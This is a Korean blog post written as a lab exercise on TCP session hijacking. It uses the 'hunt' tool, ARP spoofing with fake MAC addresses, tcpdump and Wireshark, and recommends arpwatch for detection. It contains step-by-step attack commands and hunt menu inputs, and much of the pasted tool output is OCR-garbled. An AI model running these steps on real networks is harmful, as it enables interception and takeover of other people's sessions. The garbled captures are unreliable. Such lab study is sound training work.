2020. 7. 15.

[Network] TCP 세션 하이재킹 arpwatch


    1. 구성과 계획
    • 네트워크 구성도

    telnet server  att6 - 192.168.10.150/00:0C:29:16:97:9E
    att6 - 192.168.10.149/00:0C:29:C6:9A:42
    attack att5 - 192.168.10.148/00:0C:29:5D:87:05
    client winXP - 192.168.10.147/00:0c:29:26:42:b6

    • 과정 정리
    step1. att6 arpwatch,sendmail on
    step2. client and telnet server 통신 확인
    step3. att5 hunt 설치
    step4. att6 tcpdump on
    step5. client -> telnet server 접속
    step6. att hunt 실행
    step7. wireshark 패킷 분석

    1. 관련내용정리
    hunt : TCP 세션 하이재킹을 위한 프로그램
    TCP 세션 하이재킹 : 이미 시스템에 접속되어 세션이 연결되어 있는 상태를 가로채기 하는 공격

    1. 실습과정

    step1. att6 arpwatch,sendmail on
    service arpwatch start
    service sendmail restart

    step2. client and telnet server 통신 확인
    ping 192.168.10.150

    step3. att5 hunt 설치
    yum install -y hunt

    step4. att6 tcpdump on
    tcpdump -i eth0 -xX -w sessionHijacking.cap

    step5. client -> telnet server 접속
    telnet 192.168.10.150

    step6. att hunt 실행
    hunt
    d
    a
    s
    root@localhost:- daemons rst/arp/sniff/mac options exit daemcns kt 54, f reset daemon arp spoof + arp relayer daemon sniff daemon mac discovery daemon retu r n -dm> a as s ccf daemcn kt 68, s/ k) start/ stop relayer daemon I/L) list arp spoof database add host to host arp spoof delete host to host arp spoof T) test if arp spoof successed ) retu rn -arps> s daemon started ccf daemcn kt as, s/ k) start/ stop relayer daemon I/L) list arp spoof database add host to host ar s i/ I) insert single/range arp spoof r/ R) remove single/ range arp spoof y) relay database :aZZc,: insert sin le/ran e ar
    a
    192.168.10.147
    11:11:11:11:11:11
    192.168.10.150
    22:22:22:22:22:22
    1
    y
    ) retu rn -arps> s daemon started as s ccf daemcn root@localhost:- add host to host arp spoof delete host to host arp spoof T) test if arp spoof successed 192.168. la. 147 192.168.1ø.15ø kt as, s/ k) start/ stop relayer daemon I/L) list arp spoof database add host to host arp spoof delete host to host arp spoof T) test if arp spoof successed i/ I) insert single/ range arp spoof r/ R) remove single/ range arp spoof y) relay database 1/1) insert single/range arp spoof r/ R) remove single/ range arp spoof y) relay database ) retu rn -arps> a src/dst hostl to arp spoof> hostl fake mac src/dst host2 to arp spoof> host2 fake mac refresh interwal sec I RP spoof of 192.168.1ø.147 FAILED with fake mac 11:11:11. in host 192.168.1ø._ o you want to force arp spoof until successed y/n RL-C to break
    〔 「00t@localhos~ ~ 〕 # arp -a ( ~ 92 ( ~ 92 ( ~ 92 ( ~ 92 ( ~ 92 ( ~ 92 ( ~ 92 . 145 ) at ac:7b:a1:b2:3b:dø [ether 〕 on ethe .1ø.1) at 7ø:5d.cc:ß4:be.bø 〔 th 「 〕 on ethe , ~ , ~ 9 at 4c•ed:fb:98:a5:bg 〔 th 「 〕 on ethe . 148 ) at øø:øc:29:5d.87:ß5 〕 on . 149 ) at øø:øc:29:c6:9a:42 〕 on .1ø.11) at 4c•ed:fb:98:a4:ca 〔 th 「 〕 on ethe
    C:WDocuments and SettingsWkstII >arp —a 192.168.10.148 øø-øc-29-5d-8?-øs 192.168.10.149 ØØ-Øc-29-c6-9a-42 192.168.10.150 22-22-22-22-22-22 Interface: 192.168.10.14? - øx2øøø3 Internet Address Phys icaI Address r ype dynamic dynamic dynamic
    x
    x
    l
    r) reset daemon ) arp spoof + arp relayer daemon s) sniff daemon ) mac discovery daemon ) return root@localhost:- > 192.168.1ø > 192.168.1ø > 192.168.1ø > 192.168.1ø > 192.168.1ø daemcns kt 22158, I/w/r) u) s) 1) 2) 3) u) s) kt 22242, f-ee,iallcc list/watch/reset connections host up tests arp/simple hijack (avoids ack storm simple hijack daemons rst/arp/sniff/mac options if exit 192.168.1ø .187 192.168. la .187 192.168. la .187 192.168. la .187 192.168. la. 147 192.168. la. les Clø58) Cløsø) Clø61) Clø62) [1145) 1266 arp .189 .189 .189 .189 . Isa > 192.168.1a.1a2 kt 22392, f-ee,iallcc list/watch/reset connections host up tests arp/simple hijack (avoids ack storm simple hijack daemons rst/arp/sniff/mac options exit if arp used) [23) [23) [23) [23) [23) 23 used)
    a
    0
    r
    y
    s
    I/w/r) root@localhost:- > 192.168.1ø > 192.168.1ø > 192.168.1ø > 192.168.1ø 192.168. la. 147 > 192.168.1ø 192.168.1ø.1ß5 192.168.1ø.1ø5 Main menu - rcv ree a cc u) s) 1) 2) 3) 5) 6) list/watch/reset connections host up tests arp/simple hijack (avoids ack storm simple hijack daemons rst/arp/sniff/mac options exit if 192.168.1ø 192.168. la 192.168. la 192.168. la .187 .187 .187 .187 Clø58) Cløsø) Clø61) Clø62) [1145) [1266) [1267) s poofed ine+echo+\r, arp .189 .189 .189 .189 . Isa used) [23) [23) [23) [23) [23) [23) [23) choose conn> 4 hosts already ARP input mode [r) aw, > 192.168.1ø.1ß2 > 192.168.1ø.1ø2 line* Cel cho ump connectin y/n Y ump Cs)rc/ [bloth s

    step7. wireshark 패킷 분석
    wireshark on
    • filtering : ip.addr == 192.168.10.150
    ~ 9 2 , ~ 58 , , ~ 47 ~ 9 2 , ~ 58 , , 15ß ~ 9 2 , ~ 58 , , 15ß ~ 9 2 , ~ 58 , , ~ 47 ~ 9 2 , ~ 58 , , ~ 47 ~ 9 2 , ~ 58 , , 15ß ~ 9 2 , ~ 58 , , 15ß ~ 9 2 , ~ 58 , , ~ 47 ~ 9 2 , ~ 58 , , ~ 47 ~ 9 2 , ~ 58 , , 15ß TELNET TELNET TC P TELNET TC P Telnet Telnet ~ ~ 47 377 Telnet ~ ~ 47 Data Data 23 〔 A 〕 Data 23 「 A K 〕 S q = 83 Ack=565 Win = 64971 = 83 Ack=888 Win = 64648 Len=ø Len=ø
    텔넷 로그인 패킷
    • filtering : arp
    P S ivate 16 : 97 : P S ivate 16 : 97 : P S ivate 16 : 97 : P S ivate 16 : 97 : P S ivate 16 : 97 : 26 26 26 26 ARP ARP ARP ARP ARP ARP ARP ARP ARP 60 60 60 60 60 60 60 60 60 l•aho 192.168.10.151? 192.168.10.147 is 3t 192.168.10.147 is 3t l•aho 192.168.10.151? l•aho 192.168.10.151? 192.168.10.150 is 3t 192.168.10.150 is 3t l•aho 192.168.10.148? l•aho 192.168.10.148? Te11 192.168.10.147 Te11 192.168.10.147 Te11 192.168.10.147 Te11 192.168.10.150 Te11 192.168.10.150
    arp 스푸핑을 하는 패킷

    1. 결론
    요즘 텔넷은 tcp 하이재킹이 어렵다. 시도하는순간 연결을 종료해버린다.
    항상 맥주소가 임의로 해커에게 바뀌지않도록 감시해야한다.



시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)